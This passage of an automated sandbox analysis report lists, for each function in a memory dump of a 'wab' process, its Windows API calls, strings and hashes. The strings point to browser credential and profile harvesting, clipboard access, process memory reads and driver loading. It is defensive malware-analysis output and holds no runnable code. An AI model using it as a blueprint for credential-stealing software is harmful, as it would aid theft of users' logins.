                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                      APIs
                                      • EmptyClipboard.USER32 ref: 00409882
                                      • wcslen.MSVCRT ref: 0040988F
                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                      • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                      • memcpy.MSVCRT ref: 004098B5
                                      • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                      • CloseClipboard.USER32 ref: 004098D7
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                      • String ID:
                                      • API String ID: 2014503067-0
                                      • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                      • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                      APIs
                                      • GetLastError.KERNEL32 ref: 004182D7
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                      • LocalFree.KERNEL32(?), ref: 00418342
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                      • String ID: OsError 0x%x (%u)
                                      • API String ID: 403622227-2664311388
                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                      APIs
                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                      • OpenClipboard.USER32(?), ref: 00411878
                                      • GetLastError.KERNEL32 ref: 0041188D
                                      • DeleteFileW.KERNEL32(?), ref: 004118AC
                                        • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                        • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                        • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                        • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                                        • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                        • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                        • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                        • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                        • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                      • String ID:
                                      • API String ID: 1203541146-0
                                      • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                      • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                      • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                      • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 004173BE
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                      • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                      • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                      • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                      APIs
                                      • _wcsicmp.MSVCRT ref: 004022A6
                                      • _wcsicmp.MSVCRT ref: 004022D7
                                      • _wcsicmp.MSVCRT ref: 00402305
                                      • _wcsicmp.MSVCRT ref: 00402333
                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                      • memset.MSVCRT ref: 0040265F
                                      • memcpy.MSVCRT ref: 0040269B
                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                      • memcpy.MSVCRT ref: 004026FF
                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                      • API String ID: 577499730-1134094380
                                      • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                      • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                      • String ID: :stringdata$ftp://$http://$https://
                                      • API String ID: 2787044678-1921111777
                                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                      • GetDC.USER32 ref: 004140E3
                                      • wcslen.MSVCRT ref: 00414123
                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                      • _snwprintf.MSVCRT ref: 00414244
                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                      • String ID: %s:$EDIT$STATIC
                                      • API String ID: 2080319088-3046471546
                                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                      APIs
                                      • EndDialog.USER32(?,?), ref: 00413221
                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                      • memset.MSVCRT ref: 00413292
                                      • memset.MSVCRT ref: 004132B4
                                      • memset.MSVCRT ref: 004132CD
                                      • memset.MSVCRT ref: 004132E1
                                      • memset.MSVCRT ref: 004132FB
                                      • memset.MSVCRT ref: 00413310
                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                      • memset.MSVCRT ref: 004133C0
                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                      • memcpy.MSVCRT ref: 004133FC
                                      • wcscpy.MSVCRT ref: 0041341F
                                      • _snwprintf.MSVCRT ref: 0041348E
                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                      • SetFocus.USER32(00000000), ref: 004134B7
                                      Strings
                                      • {Unknown}, xrefs: 004132A6
                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                      • API String ID: 4111938811-1819279800
                                      • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                      • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                      APIs
                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                      • EndDialog.USER32(?,?), ref: 0040135E
                                      • DeleteObject.GDI32(?), ref: 0040136A
                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                      • ShowWindow.USER32(00000000), ref: 00401398
                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                      • String ID:
                                      • API String ID: 829165378-0
                                      • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                      • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                      APIs
                                      • memset.MSVCRT ref: 00404172
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      • wcscpy.MSVCRT ref: 004041D6
                                      • wcscpy.MSVCRT ref: 004041E7
                                      • memset.MSVCRT ref: 00404200
                                      • memset.MSVCRT ref: 00404215
                                      • _snwprintf.MSVCRT ref: 0040422F
                                      • wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 0040426E
                                      • memset.MSVCRT ref: 004042CD
                                      • memset.MSVCRT ref: 004042E2
                                      • _snwprintf.MSVCRT ref: 004042FE
                                      • wcscpy.MSVCRT ref: 00404311
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                      • API String ID: 2454223109-1580313836
                                      • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                      • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                      APIs
                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                      • memcpy.MSVCRT ref: 004115C8
                                      • ShowWindow.USER32(?,?), ref: 004115FE
                                      • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                      • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                      • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                      • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                      • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                        • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                        • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                      • API String ID: 4054529287-3175352466
                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                      • API String ID: 3143752011-1996832678
                                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                      APIs
                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                      • API String ID: 667068680-2887671607
                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                      • API String ID: 1607361635-601624466
                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _snwprintf$memset$wcscpy
                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                      • API String ID: 2000436516-3842416460
                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                      APIs
                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                      • String ID:
                                      • API String ID: 1043902810-0
                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
